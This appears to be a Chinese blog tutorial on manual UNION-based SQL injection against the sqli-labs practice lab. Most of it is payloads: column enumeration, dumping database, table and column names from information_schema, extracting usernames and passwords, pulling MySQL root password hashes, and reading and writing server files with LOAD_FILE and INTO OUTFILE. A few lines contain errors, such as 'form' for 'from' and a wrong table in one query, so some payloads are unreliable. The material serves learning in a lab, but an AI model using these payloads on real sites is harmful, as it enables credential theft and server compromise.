手工注入简单轮子

注入环境 sqli-labs-master

最简单的开始。

1.png

先看下他的mysql查询语句

select * from users where id='$id'    //id完全可控 

select * from users where id='1' and 1=1 --+ '  //bad

查询字段(列),DATABASES,TABLES,COLUMNS.

select * from user where id='1' and 1=1 union select 1,2,3,4,5 --+ 
                                        order by 1,2,3,4,5 --+ 

4.png

报错信息可以得出 1,2,3 存在三个列;

5.png

6.png

通过内置函数查询数据库名:

7.png

select * form users where id='1' and 1=2 union select 1,database(),3 --+ //语句

查询数据库表:

8.png

' and 1=2 union select 1,group_concat(table_name) from information_schema.schemata where table_schema='security' --+

查询指定表中列:

9.png

'and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+

查询列数据:

10.png

'and 1=2 union select 1,group_concat(username),group_concat(password) from users --+

常用内置函数:

VERSION() or @@VERSION  //数据库版本
USER() CURRENT_USER(),CURRENT_USER,SYSTEM_USER(),SESSION_USER() //当前用户
id=1%27%20and%201=2%20union%20select%201,2,group_concat%28unhex%28hex%28password%29%29%29%20from%20mysql.user%20where%20user=%27root%27%20--+
报错 Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION  //前后编码不一致造成

查询库名:

database() //获取当前库
?id=1%27%20and%201=2%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+

获取主机名:

@@hostname;

读文件:

LOAD_FILE(' or hex') //默认路径@@datadir;

写文件:

select 1,'2 or hex',3 into outfile '/var/www';

标签: none

添加新评论